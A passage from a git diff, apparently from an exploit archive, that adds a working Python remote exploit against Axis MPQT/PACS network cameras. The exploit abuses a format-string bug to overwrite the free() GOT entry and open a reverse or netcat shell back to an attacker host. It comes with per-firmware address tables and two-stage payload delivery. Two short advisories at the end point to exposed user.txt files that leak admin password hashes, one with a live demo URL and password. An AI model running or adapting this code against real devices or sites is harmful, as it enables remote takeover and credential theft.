# .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # PACS + 'MIPS-1.3x': [ + 0x41e4cc, # Adjust to GOT free() address + 0x420a78, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # PACS + 'MIPS-1.1x': [ + 0x41e268, # Adjust to GOT free() address + 0x420818, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + +# +# Tested with execstack to set executable stack flag bit on bin's and lib's +# +# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working. +# + + # ARMel with bin/libs executable stack flag set with 'execstack' + # MPQT + 'ARM-5.50x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x1e7c8, # .bss shellcode address + 93, # 1st POP's + 1, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'ARMel' # Shellcode type (ARMel) + ], + + # ARMel with bin/libs executable stack flag set with 'execstack' + # MPQT + 'ARM-5.55x': [ # + 0x1c15c, # Adjust to GOT free() address + 0x1e834, # .bss shellcode address + 59, # 1st POP's + 80, # 2nd POP's + 'axis', # Aligns injected code + 800, # How big buffer before shellcode + 'ARMel' # Shellcode type (ARMel) + ], + +# +# Using direct parameter access format string, AKA 'New Style' +# + # MPQT + 'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root) + 0x1c1b4, # Adjust to GOT free() address + 0x10178, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.2x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x1013c, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.4x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x101fc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], +# +# Using POP format string, AKA 'Old Style' +# + + # MPQT + 'ARM-NCSH-5.5x': [ # + 0x1c15c, # Adjust to GOT free() address + 0xfdcc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 97, # 1st POP's + 0, # 2nd POP's + 41, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.6x': [ # + 0x1c15c, # Adjust to GOT free() address + 0xfcec, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 97, # 1st POP's + 0, # 2nd POP's + 41, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.7x': [ # + 0x1c1c0, # Adjust to GOT free() address + 0xf800, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 132, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # Will go in endless loop after exit of nc shell... DoS sux + # MPQT + 'ARM-NCSH-5.8x': [ # + 0x1b39c, # Adjust to GOT free() address + 0xf8c0, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 98, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 1, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-6.1x': [ # + 0x1d2a4, # Adjust to GOT free() address +# 0xecc4, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 0xecc8, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 106, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 1, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], +# +# Using POP format string, AKA 'Old Style' +# + + # MPQT + 'CRISv32-5.5x': [ # + 0x8d148, # Adjust to GOT free() address + 0x8f5a8, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.4x': [ # + 0x8d0e0, # Adjust to GOT free() address + 0x8f542, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.2x': [ # + 0x8d0b4, # Adjust to GOT free() address + 0x8f4d6, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.20.0': [ # + 0x8d0e4, # Adjust to GOT free() address + 0x8f546, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ] + + + } + + if self.target == 0: + return target_db + + if not self.target in target_db: + print "[!] Unknown FMS key: %s!" % self.target + sys.exit(1) + + if self.verbose: + print "[Verbose] Number of availible FMS keys:",len(target_db) + + return target_db + + +# +# Validate correctness of HOST, IP and PORT +# +class Validate: + + def __init__(self,verbose): + self.verbose = verbose + + # Check if IP is valid + def CheckIP(self,IP): + self.IP = IP + + ip = self.IP.split('.') + if len(ip) != 4: + return False + for tmp in ip: + if not tmp.isdigit(): + return False + i = int(tmp) + if i < 0 or i > 255: + return False + return True + + # Check if PORT is valid + def Port(self,PORT): + self.PORT = PORT + + if int(self.PORT) < 1 or int(self.PORT) > 65535: + return False + else: + return True + + # Check if HOST is valid + def Host(self,HOST): + self.HOST = HOST + + try: + # Check valid IP + socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP + # Or we check again if it is correct typed IP + if self.CheckIP(self.HOST): + return self.HOST + else: + return False + except socket.error as e: + # Else check valid DNS name, and use the IP address + try: + self.HOST = socket.gethostbyname(self.HOST) + return self.HOST + except socket.error as e: + return False + + + +if __name__ == '__main__': + +# +# Help, info and pre-defined values +# + INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis ]' + HTTP = "http" + HTTPS = "https" + proto = HTTP + verbose = False + noexploit = False + lhost = '192.168.0.1' # Default Local HOST + lport = '31337' # Default Local PORT + rhost = '192.168.0.90' # Default Remote HOST + rport = '80' # Default Remote PORT + # Not needed for the SSI exploit, here for possible future usage. +# creds = 'root:pass' + creds = False + +# +# Try to parse all arguments +# + try: + arg_parser = argparse.ArgumentParser( +# prog=sys.argv[0], + prog='axis-ssid-PoC.py', + description=('[*]' + INFO + '\n')) + arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']') + arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']') + arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']') + arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']') + arg_parser.add_argument('--fms', required=False, help='Manual FMS key') + if creds: + arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']') + arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]') + arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]') + arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]') + arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose') + args = arg_parser.parse_args() + except Exception as e: + print INFO,"\nError: %s\n" % str(e) + sys.exit(1) + + # We want at least one argument, so print out help + if len(sys.argv) == 1: + arg_parser.parse_args(['-h']) + + print "\n[*]",INFO + + if args.verbose: + verbose = args.verbose + + # Print out info from dictionary + if args.dict: + target = FMSdb(rhost,verbose).FMSkey(0) + print "[db] Number of FMS keys:",len(target) + + # Print out detailed info from dictionary + if verbose: + + print "[db] Target details of FMS Keys availible for manual xploiting" + print "\n[FMS Key]\t[GOT Address]\t[BinSh Address]\t[POP1]\t[POP2]\t[POP3]\t[POP4]\t[Shellcode]" + + for tmp in range(0,len(target)): + Key = sorted(target.keys())[tmp] + temp = re.split('[-]',Key)[0:10] + + if temp[1] == 'NCSH': + print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',target[Key][4],'\t',target[Key][5],'\t',target[Key][6] + + print "\n[FMS Key]\t[GOT Address]\t[BSS Address]\t[POP1]\t[POP2]\t[Align]\t[Buf]\t[Shellcode]" + for tmp in range(0,len(target)): + Key = sorted(target.keys())[tmp] + temp = re.split('[-]',Key)[0:10] + + if temp[1] != 'NCSH': + print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',len(target[Key][4]),'\t',target[Key][5],'\t',target[Key][6] + + print "\n" + else: + print "[db] Target FMS Keys availible for manual xploiting instead of using auto mode:" + Key = "" + for tmp in range(0,len(target)): + Key += sorted(target.keys())[tmp] + Key += ', ' + print '\n',Key,'\n' + sys.exit(0) + +# +# Check validity, update if needed, of provided options +# + if args.https: + proto = HTTPS + if not args.rport: + rport = '443' + + if creds and args.auth: + creds = args.auth + + if args.noexploit: + noexploit = args.noexploit + + if args.rport: + rport = args.rport + + if args.rhost: + rhost = args.rhost + + if args.lport: + lport = args.lport + + if args.lhost: + lhost = args.lhost + + # Check if LPORT is valid + if not Validate(verbose).Port(lport): + print "[!] Invalid LPORT - Choose between 1 and 65535" + sys.exit(1) + + # Check if RPORT is valid + if not Validate(verbose).Port(rport): + print "[!] Invalid RPORT - Choose between 1 and 65535" + sys.exit(1) + + # Check if LHOST is valid IP or FQDN, get IP back + lhost = Validate(verbose).Host(lhost) + if not lhost: + print "[!] Invalid LHOST" + sys.exit(1) + + # Check if RHOST is valid IP or FQDN, get IP back + rhost = Validate(verbose).Host(rhost) + if not rhost: + print "[!] Invalid RHOST" + sys.exit(1) + + +# +# Validation done, start print out stuff to the user +# + if noexploit: + print "[i] Test mode selected, no exploiting..." + if args.https: + print "[i] HTTPS / SSL Mode Selected" + print "[i] Remote target IP:",rhost + print "[i] Remote target PORT:",rport + print "[i] Connect back IP:",lhost + print "[i] Connect back PORT:",lport + + rhost = rhost + ':' + rport + +# +# FMS key is required into this PoC +# + if not args.fms: + print "[!] FMS key is required!" + sys.exit(1) + else: + Key = args.fms + print "[i] Trying with FMS key:",Key + +# +# Prepare exploiting +# + # Look up the FMS key in dictionary and return pointer for FMS details to use + target = FMSdb(rhost,verbose).FMSkey(Key) + + if target[Key][6] == 'NCSH1': + NCSH1 = target[Key][6] + NCSH2 = "" + elif target[Key][6] == 'NCSH2': + NCSH2 = target[Key][6] + NCSH1 = "" + else: + NCSH1 = "" + NCSH2 = "" + + if Key == 'ARM-NCSH-5.8x': + print "\nExploit working, but will end up in endless loop after exiting remote NCSH\nDoS sux, so I'm exiting before that shit....\n\n" + sys.exit(0) + + print "[i] Preparing shellcode:",str(target[Key][6]) + + # We don't use url encoded shellcode with Netcat shell + # This is for MIPS/CRISv32 and ARM shellcode + if not NCSH1 and not NCSH2: + FMSdata = target[Key][4] # This entry aligns the injected shellcode + + # Building up the url encoded shellcode for sending to the target, + # and replacing LHOST / LPORT in shellcode to choosen values + + # part of first 500 decoded bytes will be overwritten during stage #2, and since + # there is different 'tailing' on the request internally, keep it little more than needed, to be safe. + # Let it be 0x00, just for fun. + FMSdata += '%00' * target[Key][5] + + # Connect back IP to url encoded + ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.'))) + ip_hex = ip_hex.split() + IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3]; + + # Let's break apart the hex code of LPORT into two bytes + port_hex = hex(int(lport))[2:] + port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2) + port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2)) + port_hex = port_hex.split() + + if (target[Key][6]) == 'MIPSel': + # Connect back PORT + if len(port_hex) == 1: + PP1 = "%ff" + PP0 = '%{:02x}'.format((int(port_hex[0],16)-1)) + elif len(port_hex) == 2: + # Little Endian + PP1 = '%{:02x}'.format((int(port_hex[0],16)-1)) + PP0 = '%{:02x}'.format(int(port_hex[1],16)) + elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32 + # Connect back PORT + if len(port_hex) == 1: + PP1 = "%00" + PP0 = '%{:02x}'.format(int(port_hex[0],16)) + elif len(port_hex) == 2: + # Little Endian + PP1 = '%{:02x}'.format(int(port_hex[0],16)) + PP0 = '%{:02x}'.format(int(port_hex[1],16)) + elif (target[Key][6]) == 'CRISv32': + # Connect back PORT + if len(port_hex) == 1: + PP1 = "%00" + PP0 = '%{:02x}'.format(int(port_hex[0],16)) + elif len(port_hex) == 2: + # Little Endian + PP1 = '%{:02x}'.format(int(port_hex[0],16)) + PP0 = '%{:02x}'.format(int(port_hex[1],16)) + else: + print "[!] Unknown shellcode! (%s)" % str(target[Key][6]) + sys.exit(1) + + # Replace LHOST / LPORT in URL encoded shellcode + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("IP1",IP1) + shell = shell.replace("IP2",IP2) + shell = shell.replace("IP3",IP3) + shell = shell.replace("IP4",IP4) + shell = shell.replace("PP0",PP0) + shell = shell.replace("PP1",PP1) + FMSdata += shell + +# +# Calculate the FMS values to be used +# + # Get pre-defined values + ALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS +# POP_SIZE = 8 + POP_SIZE = 1 + + GOThex = target[Key][0] + BSShex = target[Key][1] + GOTint = int(GOThex) + + # 'One-Write-Where-And-What' + if not NCSH1 and not NCSH2: + + POP1 = target[Key][2] + POP2 = target[Key][3] + + # Calculate for creating the FMS code + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE) + + BSSint = int(BSShex) + BSSint = (BSSint - GOTint - ALREADY_WRITTEN) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated BSSint:",BSSint + + # 'Two-Write-Where-And-What' using "New Style" + elif NCSH2: + + POP1 = target[Key][2] + POP2 = target[Key][3] + POP3 = target[Key][4] + POP4 = target[Key][5] + POP2_SIZE = 2 + + # We need to count higher than provided address for the jump + BaseAddr = 0x10000 + BSShex + + # Calculate for creating the FMS code + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + + # Calculate FirstWhat value + FirstWhat = BaseAddr - (ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + + # Calculate SecondWhat value, so it always is 0x20300 + SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE) + + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("LHOST",lhost) + shell = shell.replace("LPORT",lport) + + FirstWhat = FirstWhat - len(shell) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat + + + # 'Two-Write-Where-And-What' using "Old Style" + elif NCSH1: + + POP1 = target[Key][2] + POP2 = target[Key][3] + POP3 = target[Key][4] + POP4 = target[Key][5] + POP2_SIZE = 2 + + # FirstWhat writes with 4 bytes (Y) (0x0002YYYY) + # SecondWhat writes with 1 byte (Z) (0x00ZZYYYY) + if BSShex > 0x10000: + MSB = 1 + else: + MSB = 0 + + # We need to count higher than provided address for the jump + BaseAddr = 0x10000 + BSShex + + # Calculate for creating the FMS code + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) + + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE) + + # Calculate FirstWhat value + FirstWhat = BaseAddr - (ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE) + + # Calculate SecondWhat value, so it always is 0x203[00] or [01] + SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB + + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("LHOST",lhost) + shell = shell.replace("LPORT",lport) + + GOTint = GOTint - len(shell) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat + + else: + print "[!] NCSH missing, exiting" + sys.exit(1) +# +# Let's start the exploiting procedure +# + +# +# Stage one +# + if NCSH1 or NCSH2: + + # "New Style" needs to make the exploit in two stages + if NCSH2: + FMScode = do_FMS(rhost,verbose) + # Writing 'FirstWhere' and 'SecondWhere' + # 1st request + FMScode.AddADDR(GOTint) # Run up to free() GOT address + # + # 1st and 2nd "Write-Where" + FMScode.AddDirectParameterN(POP1) # Write 1st Where + FMScode.Add("XX") # Jump up two bytes for next address + FMScode.AddDirectParameterN(POP2) # Write 2nd Where + FMSdata = FMScode.FMSbuild() + else: + FMSdata = "" + + print "[>] StG_1: Preparing netcat connect back shell to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata)) + else: + print "[>] StG_1: Sending and decoding shellcode to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata)) + + # Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM + # Actually, any valid and public readable .shtml file will work... + # (One of the two below seems always to be usable) + # + # For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two + # For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url + # + try: + target_url = "/httpDisabled.shtml?user_agent=" + if noexploit: + target_url2 = target_url + else: + target_url2 = "/httpDisabled.shtml?&http_user=" + + if NCSH2: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell + else: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) + except urllib2.HTTPError as e: + if e.code == 404: + print "[<] Error",e.code,e.reason + target_url = "/view/viewer_index.shtml?user_agent=" + if noexploit: + target_url2 = target_url + else: + target_url2 = "/view/viewer_index.shtml?&http_user=" + print "[>] Using alternative target shtml" + if NCSH2: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell + else: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) + except Exception as e: + if not NCSH2: + print "[!] Shellcode delivery failed:",str(e) + sys.exit(1) +# +# Stage two +# + +# +# Building and sending the FMS code to the target +# + print "[i] Building the FMS code..." + + FMScode = do_FMS(rhost,verbose) + + # This is an 'One-Write-Where-And-What' for FMS + # + # Stack Example: + # + # Stack content | Stack address (ASLR) + # + # 0x0 | @0x7e818dbc -> [POP1's] + # 0x0 | @0x7e818dc0 -> [free () GOT address] + # 0x7e818dd0 | @0x7e818dc4>>>>>+ "Write-Where" (%n) + # 0x76f41fb8 | @0x7e818dc8 | -> [POP2's] + # 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address] + # 0x76f55ab8 | @0x7e818dd0<<<<<+ "Write-What" (%n) + # 0x1 | @0x7e818dd4 + # + if not NCSH1 and not NCSH2: + FMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's + FMScode.AddADDR(GOTint) # GOT Address + FMScode.AddWRITEn(1) # 4 bytes Write-Where +# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) + + FMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's + FMScode.AddADDR(BSSint) # BSS shellcode address + FMScode.AddWRITEn(1) # 4 bytes Write-What +# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) + + # End of 'One-Write-Where-And-What' + + + # This is an 'Two-Write-Where-And-What' for FMS + # + # Netcat shell and FMS code in same request, we will jump to the SSI function + # We jump over all SSI tagging to end up directly where "xxx" will + # be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv()) + # + # The Trick here is to write lower target address, that we will jump to when calling free(), + # than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT + # address with two LSB writes. + # + elif NCSH2: + # + # Direct parameter access for FMS exploitation are really nice and easy to use. + # However, we need to exploit in two stages with two requests. + # (I was trying to avoid this "Two-Stages" so much as possibly in this exploit developement...) + # + # 1. Write "Two-Write-Where", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB) + # 2. Write with "Two-Write-What", where 1st (LSB) and 2nd (MSB) "Write-Where" pointing to. + # + # With "new style", we can write with POPs independently as we don't depended of same criteria as in "NCSH1", + # we can use any regular "Stack-to-Stack" pointer as we can freely choose the POP-and-Write. + # [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.] + # + # Stack Example: + # + # Stack content | Stack address (ASLR) + # + # 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st "Write-Where" [@Stage One] + # 0x76f41fb8 | @0x7e818dc8 | + # 0x76f3d70c | @0x7e818dcc | + # 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st "Write-What" [@Stage Two] + # 0x1 | @0x7e818dd4 + # [....] + # 0x1c154 | @0x7e818e10 + # 0x7e818e20 | @0x7e818e14>>>>>+ 2nd "Write-Where" [@Stage One] + # 0x76f41fb8 | @0x7e818e18 | + # 0x76f3d70c | @0x7e818e1c | + # 0x76f55758 | @0x7e818e20<<<<<+ 2nd "Write-What" [@Stage Two] + # 0x1 | @0x7e818e24 + # + + FMScode.Add(shell) + + # + # 1st and 2nd "Write-Where" already done in stage one + # + # 1st and 2nd "Write-What" + # + FMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. + FMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB) + FMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) + FMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation + + elif NCSH1: + # Could use direct argument addressing here, but I like to keep "old style" as well, + # as it's another interesting concept. + # + # Two matching stack contents -> stack address in row w/o or max two POP's between, + # is needed to write two bytes higher (MSB). + # + # + # Stack Example: + # + # Stack Content | @Stack Address (ASLR) + # + # 0x9c | @7ef2fde8 -> [POP1's] + # [....] + # 0x1 | @7ef2fdec -> [GOTint address] + #------ + # 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB] + # -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer) + # 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB] + # ------ | | + # [....] -> [POP3's] | | + # 0x7fb99dc | @7ef2fe7c | | + # 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX] + # 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX)) + # -> [POP4's] | + # (nil) | @7ef2fe88 | [Count up to 0x20300] + # 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX) + + FMScode.Add(shell) + + # Write FirstWhere for 'FirstWhat' + FMScode.AddPOP(POP1) + FMScode.AddADDR(GOTint) # Run up to free() GOT address + FMScode.AddWRITEn(1) + + # Write SecondWhere for 'SecondWhat' + # + # This is special POP with 1 byte, we can maximum POP 2! + # + # This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement + # for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes. + # Kept as reference as we now using direct parameter access AKA 'New Style" for 5.2x/5.4x + # + if POP2 != 0: + # We only want to write 'SecondWhat' two bytes higher at free() GOT + if POP2 > 2: + print "POP2 can't be greater than two!" + sys.exit(1) + if POP2 == 1: + FMScode.Add("%2c") + else: + FMScode.Add("%1c%1c") + else: + FMScode.Add("XX") + FMScode.AddWRITEn(1) + + # Write FirstWhat pointed by FirstWhere + FMScode.AddPOP(POP3) # Old Style POP's + FMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. + FMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB) + + # Write SecondWhat pointed by SecondWhere + FMScode.AddPOP(POP4) # Old Style POP's + FMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) + FMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation + + else: + sys.exit(1) + + FMSdata = FMScode.FMSbuild() + + print "[>] StG_2: Writing shellcode address to free() GOT address:",'0x{:08x}'.format(GOThex),"(%d bytes)" % (len(FMSdata)) + + # FMS comes here, and calculations start after '=' in the url + try: + if NCSH1 or NCSH2: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell + else: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode + except urllib2.HTTPError as e: + print "[!] Payload delivery failed:",str(e) + sys.exit(1) + except Exception as e: + # 1st string returned by HTTP mode, 2nd by HTTPS mode + if str(e) == "timed out" or str(e) == "('The read operation timed out',)": + print "[i] Timeout! Payload delivered sucessfully!" + else: + print "[!] Payload delivery failed:",str(e) + sys.exit(1) + + if noexploit: + print "\n[*] Not exploiting, no shell...\n" + else: + print "\n[*] All done, enjoy the shell...\n" + +# +# [EOF] +# diff --git a/platforms/php/webapps/40126.txt b/platforms/php/webapps/40126.txt new file mode 100755 index 000000000..0629a68c8 --- /dev/null +++ b/platforms/php/webapps/40126.txt @@ -0,0 +1,13 @@ +# Exploit Title: Free News Script User Password Download File +# Date: 2016-07-18 +# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com +# Vendor Homepage: http://www.newsp.eu/index.php?pt=ns +# Version: All Version +# Download Link : http://www.newsp.eu/newsp.zip + +Exploit : +http://site/admin/user.txt +Admin|e3afed0047b08059d0fada10f400c1e5|1|1|1|1| + +Username = Admin +Password Hash = e3afed0047b08059d0fada10f400c1e5 [MD5] diff --git a/platforms/php/webapps/40127.txt b/platforms/php/webapps/40127.txt new file mode 100755 index 000000000..cb131d761 --- /dev/null +++ b/platforms/php/webapps/40127.txt @@ -0,0 +1,16 @@ +# Exploit Title: PHP calendar script Password Download File +# Date: 2016-07-18 +# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com +# Vendor Homepage: http://www.newsp.eu/calendarscript.php?pt=st +# Version: All Version +# Download Link : http://www.newsp.eu/calendar.zip + +Exploit : +http://site/user.txt +Admin|fe01ce2a7fbac8fafaed7c982a04e229 +Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5] + +Test : +Exploit : http://www.newsp.eu/demo/user.txt +Login Url : http://www.newsp.eu/demo/login.php +Password : demo